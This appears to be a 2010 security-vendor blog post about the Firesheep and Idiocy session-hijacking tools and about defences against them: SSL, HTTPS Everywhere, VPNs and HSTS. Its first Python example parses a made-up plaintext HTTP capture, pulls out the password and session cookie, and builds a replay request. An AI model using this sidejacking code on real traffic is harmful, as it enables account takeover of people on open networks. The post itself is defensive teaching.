At least two tools have been released in the past week that make hijacking a logged-in Facebook, Twitter, or just about any other Web 2.0 account while you surf from your local coffee shop a drag-and-drop proposition. From a technical standpoint, it has never been difficult to do. With these new tools, however, it becomes trivial. I'm talking about something my grandmother can use.
Idiocy bills itself as a warning shot to people browsing the Internet insecurely. The premise is simple: it is a 130-line Python script that sniffs open wireless networks for Twitter session cookies, uses any cookie it finds to hijack that session, and sends a single Tweet from the victim's account. The message is equally simple: "I browsed Twitter unsecurely on a public network and all I got was this lousy tweet." http://jonty.co.uk/idiocy-what.
The other tool, Firesheep (detected as HKTL_FYRSNIFF), is more sophisticated. It is a Firefox plug-in that collects session cookies for a much larger set of sites and lets you load a captured session straight into your own browser with a click, so you are fully logged in as the victim. The list of sites it can attack is extensible by the user.
The name Firesheep is probably an homage to the Wall of Sheep (or Wall of Shame) seen at many security and networking conferences, which operates in much the same way: showing user names and passwords collected from the open conference network on a big screen is a great way to create a sense of urgency about the systemic weaknesses that make such tools possible. Before you actually try tools like these yourself, however, make sure that doing so is legal where you are; intercepting other people's traffic, let alone using their sessions, is illegal in many jurisdictions without their consent.
The sidejacking attack used by these tools is simple. Once you enter your user name and password to log in to a website, the site hands your browser a cookie. Usually it is a random token that only a successfully logged-in user and the site hold matching copies of, and from then on the browser presents that token, not your password, with every request it makes to the site.
These tools simply watch the network and capture the token, either as the site sends it to you after you log in (the Set-Cookie header) or as your browser sends it back to request the next page (the Cookie header). The token is the session: with a copy of it, impersonating your browser and taking over your session is trivial, and the site cannot tell the difference. As scary as that is, some sites still send the user name and password themselves in the clear, without any encryption, as well.
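As an added example, not code from Idiocy or Firesheep, here is the core of the sidejacking mechanic in Python on a constructed sample capture (the host social.example, the cookie names and values, the form field names and the password are all made up). It pulls the session token out of either direction of the plaintext exchange, pulls the password out of the login form for the sites that post it in the clear, and builds the request an attacker would replay. The last function shows why the Secure cookie attribute matters for this attack and the HttpOnly attribute does not.

```python
"""Sidejacking on constructed plaintext HTTP traffic (added example, not
Idiocy or Firesheep code). Host names, cookie values, form fields and the
password below are made up for illustration."""
from urllib.parse import parse_qs

# Constructed sample capture: the victim's login POST, the server's reply
# that hands out a session cookie, and the browser's next request re-using it.
LOGIN_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: social.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 26\r\n\r\n"
    b"user=alice&pass=hunter2%21"
)
LOGIN_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: http://social.example/home\r\n"
    b"Set-Cookie: sid=7c1e9a4d2b3f4e5a6b7c8d9e0f1a2b3c; Path=/; HttpOnly\r\n"
    b"Set-Cookie: lang=en; Path=/\r\n"
    b"Content-Length: 0\r\n\r\n"
)
NEXT_REQUEST = (
    b"GET /home HTTP/1.1\r\n"
    b"Host: social.example\r\n"
    b"Cookie: sid=7c1e9a4d2b3f4e5a6b7c8d9e0f1a2b3c; lang=en\r\n"
    b"User-Agent: Mozilla/5.0 (victim)\r\n\r\n"
)


def parse_http(raw):
    """Split a raw HTTP message into (start line, [(header, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def header(headers, wanted):
    """All values of one (lower-cased) header name."""
    return [v for n, v in headers if n == wanted]


def parse_set_cookie(value):
    """One Set-Cookie value -> (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return name.strip(), val.strip(), attrs


def credentials_from_request(raw):
    """The login form itself, for sites that post the password in the clear."""
    start, headers, body = parse_http(raw)
    ctype = "".join(header(headers, "content-type"))
    if not start.startswith("POST ") or "x-www-form-urlencoded" not in ctype:
        return {}
    return {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}


def cookies_from_response(raw):
    """Tokens learnt as the site hands them out (Set-Cookie) in the clear."""
    _, headers, _ = parse_http(raw)
    jar = {}
    for v in header(headers, "set-cookie"):
        name, value, _ = parse_set_cookie(v)
        jar[name] = value
    return jar


def cookies_from_request(raw):
    """Tokens learnt as the browser sends them back (Cookie) on the next page."""
    _, headers, _ = parse_http(raw)
    jar = {}
    for v in header(headers, "cookie"):
        for pair in v.split(";"):
            k, _, val = pair.strip().partition("=")
            jar[k] = val
    return jar


def build_hijack_request(host, path, jar, user_agent):
    """The request the attacker replays: the victim's cookie jar, own client."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in jar.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_hdr}\r\nUser-Agent: {user_agent}\r\n\r\n").encode()


def leaks_over_plain_http(set_cookie_value):
    """Secure stops the browser from ever sending the cookie over http://, so it
    never reaches a plaintext capture. HttpOnly only hides it from scripts."""
    return "secure" not in parse_set_cookie(set_cookie_value)[2]


if __name__ == "__main__":
    print(credentials_from_request(LOGIN_REQUEST))
    jar = cookies_from_request(NEXT_REQUEST)
    print(build_hijack_request("social.example", "/home", jar, "curl/7.x").decode())
```

Note that the replayed request carries a different User-Agent and comes from a different IP address, and the site in this model still accepts it: nothing in the token binds it to the victim's machine, which is exactly what makes the attack a copy-and-paste job.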
There are a few simple things you can do to protect yourself from this kind of threat.
First and foremost, use Secure Sockets Layer (SSL) whenever possible, that is, make sure the address starts with https://. Many popular sites offer some level of SSL access. Unfortunately, it is not always made clear that it is available, and not all components are supported over SSL (e.g., Facebook chat). Some sites, such as LinkedIn, let you connect to the SSL service and then silently redirect you back to plain HTTP. A site that protects only the login page and then drops to HTTP is exactly what sidejacking exploits: your password crosses the wire encrypted, but the session cookie issued afterwards travels in the clear on every page.
If you are willing to experiment with your browser, a number of sites can be used in full SSL mode. The EFF has a project called HTTPS Everywhere, a Firefox plug-in that rewrites your requests to the SSL versions of popular services, including:
- Google Search
- Most of Amazon
- WordPress.com blogs
- The New York Times
- The Washington Post
So be on the lookout for sites that use SSL for all their communication. It is also important to confirm that mobile apps and domain-specific browsers actually use SSL to connect to their back-end servers, since they give you no address bar to check. The EFF also has an ongoing campaign designed to pressure Facebook into making SSL the default for all activity.
In the past, SSL presented site administrators with a choice between security and performance. Modern hardware makes this a non-issue from the end user's perspective.
As for the service provider side, Google reported that switching Gmail to SSL for everything by default required no additional machines and no special hardware. Even if a site does need additional equipment and effort, the added security and the reduction in hijacked accounts should more than make up for it.
Be conscious of where you log in to insecure sites. If you are connected to the Internet over an open wireless network, say at a coffee shop or an airport, everything you send to sites over plain HTTP can be read by any other wireless-capable device in range; the attacker needs no special position on the network.
Another option is to use a VPN. Some home routers and wireless systems now offer this as a feature. You establish an encrypted tunnel from your machine to a trusted server, and everything you do is carried through that tunnel to your home or office network before it goes out to the Internet. This prevents anyone near you from collecting your credentials or cookies, though it only moves the exposure: traffic to non-SSL sites still leaves the far end of the tunnel in the clear. This option does require some additional setup and may have some impact on network performance.
Something new to be on the lookout for is HTTP Strict Transport Security (HSTS). Currently in draft stage, though some browsers have already implemented it, HSTS lets a server announce to clients that it must only be accessed over a secure channel. It gives site owners a way to tell your browser: no matter what I or anyone else tells you later, use the secure site for all future communication with me. The browser then rewrites http:// links to https:// itself, before any request leaves the machine. Two caveats: the header is only honored when it arrives over SSL (one received over plain HTTP could have been injected by the same attacker), so the very first connection to a site is still unprotected; and the policy expires after the server's stated max-age unless it is refreshed.
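To make the browser side of HSTS concrete, here is an added, simplified model of an HSTS policy store in Python. It is not any browser's code, and the host names and the 300-second max-age are made up. It parses the Strict-Transport-Security header, ignores it when the response did not arrive over https, honors includeSubDomains and expiry, and upgrades http:// URLs that match a live policy before a request would go out.

```python
"""Simplified HSTS policy store (added example, not any browser's code).
Host names and max-age values below are made up for illustration."""
import time
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(value):
    """'max-age=300; includeSubDomains' -> (max_age, include_subdomains),
    or None when there is no usable max-age (the directive is mandatory)."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(val.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None or max_age < 0:
        return None
    return max_age, include_sub


class HstsStore:
    """Per-host policies: host -> (expires_at, include_subdomains)."""

    def __init__(self, now=time.time):
        self.now = now          # injectable clock so expiry can be tested
        self.policies = {}

    def note_response(self, url, headers):
        """Record the policy carried by a response. Returns True if stored.
        Only an https response counts: an attacker sitting on the plaintext
        path could otherwise set, or clear, the policy himself."""
        parts = urlsplit(url)
        value = headers.get("strict-transport-security")  # lower-cased keys assumed
        if parts.scheme != "https" or value is None:
            return False
        parsed = parse_hsts(value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        if max_age == 0:                      # max-age=0 withdraws the policy
            self.policies.pop(parts.hostname, None)
            return True
        self.policies[parts.hostname] = (self.now() + max_age, include_sub)
        return True

    def is_known(self, host):
        """Live policy for the host itself, or for a parent with includeSubDomains."""
        labels = host.split(".")
        for i in range(len(labels)):
            policy = self.policies.get(".".join(labels[i:]))
            if policy is None:
                continue
            expires_at, include_sub = policy
            if expires_at <= self.now():
                continue                      # expired, treat as unknown
            if i == 0 or include_sub:
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// to https:// for known hosts before the request leaves."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname):
            return url
        port = 443 if parts.port == 80 else parts.port
        netloc = parts.hostname + (f":{port}" if port else "")
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    store = HstsStore()
    store.note_response("https://social.example/",
                        {"strict-transport-security": "max-age=300; includeSubDomains"})
    print(store.rewrite("http://chat.social.example/"))
```

The `now` parameter exists so that expiry can be exercised without waiting; a real browser also persists the store across restarts, which this model does not.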
Update as of November 1, 2010, 3:39 PM (UTC-7)
Clarification has been made with regard to using SSL in popular websites.